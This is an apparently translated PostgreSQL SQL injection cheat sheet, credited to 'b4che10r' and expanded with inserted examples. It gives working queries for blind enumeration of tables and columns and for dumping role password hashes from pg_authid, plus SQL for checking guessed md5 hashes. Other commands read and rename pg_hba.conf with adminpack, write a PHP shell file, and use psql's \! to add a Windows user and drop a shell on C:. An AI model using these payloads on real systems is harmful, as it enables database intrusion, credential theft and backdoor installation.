/* Author: b4che10r. Please credit the source when reposting, thanks. */
select version();                              -- determine the PostgreSQL version
select current_database();                     -- current database
select session_user; select current_user;      -- session user / current user
select inet_server_addr();                     -- IP address of the database server
select inet_server_port();                     -- port of the database server
pg_stat_user_tables keeps statistics for every user table in the system; its relname column is the table name, so the first table name can be read with: select relname from pg_stat_user_tables limit 1 offset 0;
select column_name from information_schema.columns where table_name = 'xxx' limit 1 offset n;   -- read the columns of table xxx one at a time (assuming the information_schema schema has not been dropped)
----------------------------------------------------------------------------------------------------
select relname from pg_stat_user_tables limit 1 offset n;   /* get the user tables one by one */
select oid from pg_class where relname = 'xxx';   /* get the oid of the table named xxx; assume it is 16402 */
select attname from pg_attribute where attrelid = 16402 limit 1 offset 6;   /* in the local test the first six rows were the system columns tableoid, cmax, xmax, cmin, xmin, ctid, so offset 6 is the first real column. System columns have attnum < 0, so "and attnum > 0" is a more reliable filter than a fixed offset, and the row order of limit/offset is only stable with an order by attnum */
select attname from pg_attribute where attrelid = (select oid from pg_class where relname = (select relname from pg_stat_user_tables limit 1 offset 2)) limit 1 offset 6;   /* the same chained into one query: first column of the third user table */
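The enumeration chain above, walked deterministically, as an added example that is not part of the original notes. It extends the one-table case to a loop any blind or UNION injection can drive: counts give the loop bounds, explicit order by makes repeated limit/offset requests consistent, and attnum/attisdropped replace the fragile "offset 6". The table name 'xxx', the schema 'public' and the offsets are placeholders; everything else is standard PostgreSQL catalog SQL.

```sql
-- Added example: deterministic table/column enumeration via the catalogs.
-- 'xxx', 'public' and the offset values are placeholders to be substituted.

-- 1. Count user tables so the offset loop knows when to stop.
select count(*) from pg_stat_user_tables;

-- 2. n-th user table. Without ORDER BY the row order behind LIMIT/OFFSET is
--    not guaranteed, so order explicitly to make repeated requests consistent.
select relname
  from pg_stat_user_tables
 order by schemaname, relname
 limit 1 offset 0;          -- replace 0 with n

-- 3. Number of real (non-system, non-dropped) columns of table 'xxx'.
select count(*)
  from pg_attribute
 where attrelid = (select oid from pg_class where relname = 'xxx')
   and attnum > 0            -- system columns (ctid, xmin, ...) have attnum < 0
   and not attisdropped;     -- dropped columns keep their pg_attribute row

-- 4. n-th column of table 'xxx', ordered by column position instead of
--    relying on a fixed offset to skip the system columns.
select attname
  from pg_attribute
 where attrelid = (select oid from pg_class where relname = 'xxx')
   and attnum > 0
   and not attisdropped
 order by attnum
 limit 1 offset 0;          -- replace 0 with n

-- 5. The whole chain as one expression: first column of the third user table.
select attname
  from pg_attribute
 where attrelid = (select oid from pg_class
                    where relname = (select relname from pg_stat_user_tables
                                      order by schemaname, relname
                                      limit 1 offset 2))
   and attnum > 0 and not attisdropped
 order by attnum
 limit 1 offset 0;

-- 6. relname is only unique per schema; qualify by namespace when two
--    schemas contain a table with the same name.
select c.oid
  from pg_class c
  join pg_namespace n on n.oid = c.relnamespace
 where n.nspname = 'public' and c.relname = 'xxx';
```

Each statement returns a single value, which is what a blind injection needs; the count queries in steps 1 and 3 are what tell the extraction loop where to stop.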
----------------------------------------------------------------------------------------------------
select rolname, rolpassword from pg_authid;   -- get the user names and password hashes (superuser privilege is required)
select usename, passwd from pg_shadow;        -- same as above
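What to do with the hashes once they are read, as an added example that is not part of the original notes. On servers using md5 authentication (everything before SCRAM in PostgreSQL 10, and still common after) rolpassword is stored as 'md5' followed by md5(password || username), so a guess can be verified directly in SQL or the values can be handed to a cracker that expects that format. The candidate password 'password123' is a constructed guess.

```sql
-- Added example: verifying a guessed password against pg_authid hashes.
-- 'password123' is a constructed guess; rolname is the salt in this scheme.
select rolname,
       rolpassword,
       rolsuper,
       rolpassword = 'md5' || md5('password123' || rolname) as guess_matches
  from pg_authid
 where rolpassword is not null;

-- Reproduce the stored value for one known user offline (this is the exact
-- string a correct guess must produce for user "postgres"):
select 'md5' || md5('password123' || 'postgres') as expected_hash;

-- On newer servers the column starts with 'SCRAM-SHA-256$' instead and the
-- md5 comparison simply returns false, so check the prefix first.
select rolname, substring(rolpassword from 1 for 4) as hash_type
  from pg_authid
 where rolpassword is not null;
```

Because the username is the salt, the same password gives a different hash for every role; a cracker must be fed the username alongside the hash.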
----------------------------------------------------------------------------------------------------
select datname from pg_database limit 1 offset n;       -- get the names of all databases on the server, one at a time
select datname from pg_stat_database limit 1 offset n;  -- same as above
----------------------------------------------------------------------------------------------------
The adminpack functions pg_logdir_ls(), pg_ls_dir(), pg_file_rename(), pg_file_write(), pg_file_read() and pg_file_length() are all confined to the ../postgresql/data directory (this restriction to the data directory is why, as mentioned in the earlier article, other directories appear to have no permission).
pg_logdir_ls(): select pg_logdir_ls();   -- list the ../postgresql/data/pg_log/ directory
pg_file_read(text, bigint, bigint): select pg_file_read('pg_hba.conf', 0, pg_file_length('pg_hba.conf'));   -- read the contents of ../postgresql/data/pg_hba.conf (offset 0, length = file size)
pg_ls_dir(text): select pg_ls_dir('pg_log');   -- list the ../postgresql/data/pg_log/ directory
select pg_file_rename('pg_hba.conf', 'fuck.conf');   -- rename pg_hba.conf to fuck.conf
select pg_file_write('fuck.txt', 'postgresql', true);   -- create a new file fuck.txt in the ../postgresql/data directory with the content "postgresql" (the third argument means append)
Writing a PHP shell works the same way: the same pg_file_write() call with '<?php phpinfo();?>' as the content and 1.php as the file name. In the original test, 1.php ended up under the ../postgresql/script/ directory.
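The file-function workflow above in one sequence, as an added example that is not part of the original notes: find where relative paths resolve, list and read the configuration files, write and append a file, read it back, and see what the data-directory confinement rejects. It assumes a superuser session with adminpack loaded (create extension adminpack, or adminpack.sql on 8.x); the file name note.txt and its contents are constructed for the example. Note that newer adminpack versions drop pg_file_read(), pg_file_length() and pg_logdir_ls() in favour of the core pg_read_file() and pg_stat_file().

```sql
-- Added example: adminpack file access from a superuser session.
-- 'note.txt' and its two lines are constructed for this example.

-- Where do relative paths resolve to? (superuser-only setting)
show data_directory;

-- List the data directory itself and size the configuration files in it.
select pg_ls_dir('.');
select pg_file_length('pg_hba.conf') as hba_bytes,
       pg_file_length('postgresql.conf') as conf_bytes;

-- Read pg_hba.conf in full (offset 0, length = file size); the core
-- pg_read_file() does the same for superusers.
select pg_file_read('pg_hba.conf', 0, pg_file_length('pg_hba.conf'));

-- Write (append = false creates/truncates), then append, then read back.
select pg_file_write('note.txt', 'line one' || chr(10), false);
select pg_file_write('note.txt', 'line two' || chr(10), true);
select pg_file_read('note.txt', 0, pg_file_length('note.txt'));

-- Paths are confined to the data directory: absolute paths outside it and
-- any ".." component are rejected, so both of these raise an error instead
-- of touching the file.
select pg_file_write('../outside.txt', 'x', true);
select pg_file_read('/etc/passwd', 0, 100);

-- Clean up: adminpack also provides pg_file_unlink().
select pg_file_unlink('note.txt');
```

The last two rejected statements are the practical reason the notes above say the functions "only" reach the data directory: anything that needs to land elsewhere (such as a PHP file in a web root) must be placed by another route, or the data directory itself must be served.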
----------------------------------------------------------------------------------------------------
After logging in with psql, the \! meta-command runs a shell command: \! net user killer 123123 /add adds a user, i.e. system commands can be executed, and \! echo ^<?php phpinfo();?^> > C:\1.php writes a shell to drive C (the carets escape < and > for cmd.exe). Note that \! runs the command on the machine where psql itself is running, so it only reaches the database server when psql is run on the server.
----------------------------------------------------------------------------------------------------
There is currently no known way to break out into a cross-database query through injection in PostgreSQL; cross-database access only works when logged into the SQL shell with a user that has the permission.
PS: I'm waiting for b4 to write the Python automated-injection script.